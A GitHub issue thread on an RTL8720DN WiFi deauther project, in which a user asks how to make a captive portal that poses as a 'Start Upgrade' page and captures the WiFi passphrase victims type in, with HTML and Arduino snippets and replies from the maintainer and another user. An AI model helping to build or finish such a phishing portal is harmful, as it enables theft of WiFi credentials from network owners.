tesa-klebeband/RTL8720dn-Deauther #58: Password Input using Web Interface

wfhstudio, 2025-05-01:
Hi Tesa,
I am still learning the code for RTL8720DN. I want to prepare Captive Portal for getting the password. Here is the html code below:

<form method-get> 
    <div><b>
    WiFi Passphrase <input type = "password" name="password" placeholder="password" minlength=8 required autofocus><div id="submit"> <input type="submit" value="Start Upgrade"></b>
    </form>

I want to display in Serial Print  but it doesn't work :

 String passwd = server.arg("password"); 
 Serial.print("Password:");
 Serial.println(passwd); 
 display.clear();

Really appreciate  if you help me out or you can refer to me the similar code. My apologie if my english is not good

Regards,
WS from Indonesia

tesa-klebeband, 2025-05-01:
Hi! 
Could you provide more info on what exactly doesn't work (like compilation error, or no string output)? What webserver lib are you using? Do you send the password via a get or post request and do you process it accordingly?
Have a nice day

wfhstudio, 2025-05-02:
[RTL8720DN-Captive_5.zip](https://github.com/user-attachments/files/20010384/RTL8720DN-Captive_5.zip)

Hi Tesa,
Thanks for the reply and appreciate it.
Here is my code. I am trying another code to store the password but it only work when I input the pasword through serial monitor, but not work if I put in the web interface. I am keen to learn about this.

I also attached library that I used

Regards,
Wisnu

ycancook, 2025-05-06:
> [RTL8720DN-Captive_5.zip](https://github.com/user-attachments/files/20010384/RTL8720DN-Captive_5.zip)
>
> Hi Tesa, Thanks for the reply and appreciate it. Here is my code. I am trying another code to [...]

Your code is so confusing. I have code related to FlashStorage_RTL8720.h. I wrote it when I first learned about ardruino, you can refer to it and use it : https://drive.google.com/file/d/1Outn5Nt37XDql2_uPKVMys1DH-IQV2Lj/view?usp=sharing

closed 2025-05-21 by tesa-klebeband